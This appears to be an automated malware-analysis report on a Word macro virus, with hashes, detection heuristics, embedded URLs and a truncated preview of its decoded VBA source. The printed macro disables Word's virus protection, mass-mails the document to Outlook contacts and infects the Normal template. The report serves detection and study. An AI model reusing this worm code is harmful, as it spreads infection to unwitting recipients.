Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e66542dc8f4559bc…

MALICIOUS

Office (OLE)

Size: 144.0 KB | Created: 2000-06-27 10:05:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 459e3544d124c2ad65dbae01644e3951
SHA-1: b2d6a122c2709da964bc6d43f8cff3797a52f395
SHA-256: e66542dc8f4559bca76a3b579272062256a611da015321e8a7d498459268e972
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a high-confidence detection for an obfuscated auto-exec VBA loader within the Document_Open macro. This macro utilizes CreateObject and appears to be designed to download and execute a second-stage payload from one of the embedded URLs. The presence of the 'Doc.Trojan.Noarmy-1' ClamAV detection further supports its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Trojan.Noarmy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Noarmy-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs and the channel that reached each:
    • http://sn.agat.net (In document text, OLE body)
    • http://altern.org/gigm/service.htm (In document text, OLE body)
    • http://www.donquichotte.com (In document text, OLE body)
    • http://www.multimania.com/antisn (In document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 124653 bytes
SHA-256: f146233cc75d30f0a8e5ab4eba99f3774c7d72de1568ad90250040477f1d724f
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NOSN"
Attribute VB_Base = "1Normal.NOSN"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim h7, g8, j1, k2, j8, l1, m5, l8, a5, _
d3, g6, h3, k1, k5, g3, n6, h5, j5, k7: Dim e8, b9, a7, d6, c5, e2, g1, l3, l9, n2, m1, h8, l5, i1, i7, e4, c7, _
c4, f3, h1, d8: Dim g5, _
e1, m4, b3, d4, f7, i3, g2, e5, d2, a4, a3, a2, c2, d1, c3, c1, b2, b1, a1 ' nrotylgytee
Private Sub Document_Open() ' vkljft
On Error Resume Next: Call f1 ' aqbapxoroqvwzkm
Call f2 ' ufuv
Randomize: Select Case System.PrivateProfileString(j1, k2, j8) ' sneftrzdxprdbwr
Case Is <> j1 ' prnzbaoycly
System.PrivateProfileString(j1, k2, j8) = 1&: Case Else ' qpawhteutgnjmx
Options.ConfirmConversions = m5 ' piohsrspwkfgtl
Options.VirusProtection = m5 ' wxdqxnlngwqnwmk
Options.SaveNormalPrompt = m5: End Select: d8 = a5: Set c4 = CreateObject(d8) ' lhsjauxfiizadnw
Set f3 = c4.GetNameSpace(l8): Select Case System.PrivateProfileString(j1, d3, g6): Case Is <> h3: Select Case c4 ' pokieyiqafb
Case k1: f3.Logon k5, g3 ' fzwsekvovjumwzq
For i = 1 To f3.AddressLists.Count: Set g4 = f3.AddressLists(i) ' grkcmgai
Set h1 = c4.CreateItem(m5): h2 = g4.AddressEntries.Count ' bgguzxq
b6 = m5 ' kvkfpkqyipjdtp
For j = 1 To h2: Set j2 = g4.AddressEntries(j): Select Case Len(j2.Address): Case Is _
> 4: Select Case InStr(Len(j2.Address) - 3, j2.Address, n6, vbTextCompare) ' ofynhrtrmkzblo
Case Is <> 0 ' yoiniqmfzsojoyd
h1.Recipients.Add j2 ' iszxzsknurq
b6 = b6 + 1 ' wcwhhxegwg
End Select: End Select ' slgc
Select Case b6 ' jgvra
Case 50 ' hychgo
Exit For: End Select: Next j: Select Case Rnd(): Case Is < 0.33: h1.Subject = h5: h1.Body = j5 ' utrnojfdfgkjnn
Case Is < 0.66 ' roeeusoapnne
h1.Subject = g1 ' fuqjqdkgvcaufh
h1.Body = l3 ' avkjbahnlsaey
Case Else: h1.Subject = l9 ' elnelxuumd
h1.Body = n2 ' scqzhty
End Select: h1.Attachments.Add ActiveDocument.FullName ' cmtzpngqeei
h1.Send: Next i ' ozojl
f3.Logoff: End Select ' smtgixupguodf
System.PrivateProfileString(j1, d3, g6) = h3: End Select ' uiyawfv
Set n1 = ActiveDocument.VBProject: Set i6 = _
n1.VBComponents.Item(1): Set n1 _
= NormalTemplate.VBProject ' mvuhefepx
Set k3 = n1.VBComponents.Item(1): i2 = False: Select Case InStr(1, ActiveDocument.Name, m1): Case False: Select Case i6.Name ' jxddlhfccxxy
Case Is <> g6: Set b5 _
= k3: Set f5 = i6 ' gpzhxnymenrjryx
i2 = True ' fpjqqebpytzw
End Select: End Select: Select Case k3.Name ' cothmb
Case Is <> g6 ' mxivvkgror
Set b5 = i6: Set f5 = k3 ' pbpxygqemywws
i2 = True ' gvwfzszvm
End Select ' lfjonjgiz
Select Case i2: Case True: i4 _
= b5.CodeModule.CountOfLines - 1 ' wynohjmgwcg
c8 = f5.CodeModule.CountOfLines: Select Case c8 ' iadcnub
Case Is > _
0: f5.CodeModule.DeleteLines 1, c8: End Select ' iove
c6 = 1 ' lthq
c9 = "": j3 = "": a6 = 0 ' dysxmghewoelr
For l2 = 1 To i4: h4 = b5.CodeModule.Lines(l2, 1) ' ctbh
i = 1 ' acihnxfteblgde
f4 = InStr(1, h4, Chr(39)) ' mixzjqj
Select Case f4 ' kjhxbtokwotut
Case 0 ' tcclf
f4 = Len(h4): Case Else ' gkobo
f4 = f4 - 2: End Select: Do ' qyrbbyfgqzzne
j = InStr(i, h4, Chr(32)): Select Case j ' npevw
Case 0: j = Len(h4) + 1 ' bhrujzdylhzo
b8 = True ' pyjcogbhesuf
Case f4 + 1: b8 = True ' lwlhje
Case Else ' ertgcioslly
b8 = False ' biljksmdqismt
End Select: n5 = Mid(h4, i, j - i) ' czrvaeobz
Select Case b8: Case True ' bdgxftgmxphz
f6 = b5.CodeModule.Lines(l2 + 1, 1) ' piknl
k4 = InStr(1, f6, Chr(32)) ' dkateku
Select Case k4: Case 0: j3 = _
"": Case Else ' vkigfkzl
j3 = Mid(f6, 1, k4 - 1) ' bzto
End Select: End Select ' kkxeqbhjgvg
Select Case n5: Case k7 + Chr(58): n5 = e8 + Chr(58): Case e8 + Chr(58) ' kmonhjq
n5 = k7 + Chr(58) ' ykaewtxctjnfu
Case k7 ' mmuwski
n5 = e8: Case e8 ' rdyimwntbzzdup
n5 = k7 ' pfovdg
End Select ' izqznso
Select Case h6: Case False: Select Case Rnd() ' pxmytuxrzhbjpm
Case Is _
< 0.02: h6 = True ' vuouikpjyvqki
Case Else ' bxumhidsun
h6 = False: Select Case b8: Case True ' ximlosne
Select Cas
... (truncated)